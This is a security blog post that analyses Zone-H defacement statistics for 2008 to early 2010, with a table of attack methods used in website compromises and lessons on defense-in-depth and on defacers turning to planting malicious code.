Web defacements are a serious problem and are a critical barometer for estimating exploitable vulnerabilities in websites. Unfortunately, most people focus too much on the impact or outcome of these attacks (the defacement) rather than the fact that their web applications are vulnerable to this level of exploitation. People are forgetting the standard Risk equation -
RISK = THREAT x VULNERABILITY x IMPACT
The resulting risk of a web defacement might be low because the the impact may not be deemed a high enough severity for particular organizations. What most people are missing, however, is that the threat and vulnerability components of the equation still exist. What happens if the defacers decided to not simply alter some homepage content and instead decided to do something more damaging such as adding malicious code to infect clients?
Zone-H Statistics Report for 2008-2009-Q1 2010
Zone-H is a clearing house that has been tracking web defacements for a number of years. At the end of May 2010, they released a statistics report which correlated data from 2008, 2009 and the first quarter of 2010. This report revealed some very interesting numbers.
What Attacks Were Being Used?
The first piece of data that was interesting to me was the table which listed the various attacks that were successfully employed which resulted in enough system access to alter the web site content.
|Attack Method||Total 2008||Total 2009|| Total 2010
|Attack against the administrator/user (password stealing/sniffing)||33.141||24.386||10.918|
|Access credentials through Man In the Middle attack||37.526||7.385||1.005|
|Other Web Application bug||36.832||99.546||42.874|
|FTP Server intrusion||32.521||11.749||5.138|
|Web Server intrusion||8.334||9.820||7.400|
|DNS attack through cache poisoning||7.541||3.289||1.361|
|Other Server intrusion||5.655||10.799||5.123|
|DNS attack through social engineering||6.310||2.847||1.358|
|Web Server external module intrusion||4.967||2.265||1.313|
|Remote administrative panel access through bruteforcing||9.991||6.862||7.046|
|Rerouting after attacking the Firewall||8.143||3.107||1.267|
|SSH Server intrusion||6.231||4.624||4.550|
|RPC Server intrusion||12.359||5.821||2.512|
|Rerouting after attacking the Router||9.170||2.671||1.327|
|Remote service password guessing||6.641||3.252||1.103|
|Telnet Server intrusion||4.050||3.476||2.562|
|Remote administrative panel access through password guessing||4.915||1.139||422|
|Remote administrative panel access through social engineering||4.431||1.502||472|
|Remote service password bruteforce||5.563||3.658||1.002|
|Mail Server intrusion||1.441||2.314||1.121|
|Not available||70.457||87.684|| 24.493
Lesson Learned #1 - Web Security Goes Beyond Securing the Web Application Itself
The first concept that was re-enforced was the fact that the majority of attack vectors had absolutely nothing at all to do with the web application itself. The attackers exploited other services that were installed (such as FTP or SSH) or even DNS cache poisoning which would give the "illusion" that the real website had been defaced. These defacement statistics should be a wake-up call for organizations to truly embrace defense-in-depth security and re-evaluate their network and host-level security posture.
Lesson Learned #2 - Vulnerability Prevalence Statistics vs. Attack Vectors used in Compromises
There are many community projects and resources available that track web vulnerabilities such as; Bugtraq, CVE and OSVDB. These are tremendously useful tools for gaging the raw numbers of vulnerabilities that exist in public and commercial web software. Additionally, a project such as the WASC Web Application Security Statistics Project which provides further information about vulnerabilities that are remotely exploitable in both public and custom code applications is useful data. All of this data helps to define both the overall attack surfaces available to attackers and the Vulnerability component of the RISK equation mentioned earlier. This information shows what COULD be exploited however there must be a threat (attacker) and a desired outcome (such as a website defacement). The data shown in this report should help organizations to prioritize the remediation of these specific attack vectors.
Lesson Learned #3 - Web Defacers Are Migrating To Installing Malicious Code
Zone-H outlines this concept at the beginning of their report:
Worms and viruses like mpack/zeus variants also allow some crackers to gather ftp account credentials, but most of the people using those tools do not deface websites, but prefer to backdoor those sites with iframe exploits in order to hack more and more users, and to steal data from them. Iskorpitx for example (but many others do it as well) uses this method to break into hostings, he usually steals credentials with viruses and sometimes even backdoors the defacements for visitors of the defaced sites to be exploited.